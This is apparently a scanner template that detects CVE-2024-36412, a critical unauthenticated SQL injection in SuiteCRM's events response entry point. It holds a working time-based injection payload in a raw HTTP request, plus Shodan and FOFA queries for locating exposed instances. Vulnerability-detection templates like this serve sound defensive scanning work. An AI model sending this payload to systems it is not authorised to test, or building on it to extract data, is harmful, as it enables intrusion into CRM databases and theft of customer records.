id: CVE-2024-36412 info: name: SuiteCRM - SQL Injection author: securityforeveryone severity: critical description: | SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue. remediation: | 7.14.4 and 8.6.1 reference: - https://0x5001.com/web-security/cve-2024-36412-proof-of-concept - https://nvd.nist.gov/vuln/detail/CVE-2024-36412 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-36412 cwe-id: CWE-89 cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* metadata: max-request: 1 verified: true vendor: salesagility product: suitecrm shodan-query: title:"SuiteCRM" fofa-query: title="SuiteCRM" tags: cve,cve2024,suitecrm,sqli http: - raw: - | @timeout: 15s GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")' condition: and # digest: 4a0a0047304502204f8813a017c08a91775dac6578074e41f7d711f60576720edc25fe3416118bdc022100de79f17b542f4b677f23ad94a47707d5a6abf171b9bc88ff404f74e9eba69d77:922c64590222798bb761d5b6d8e72950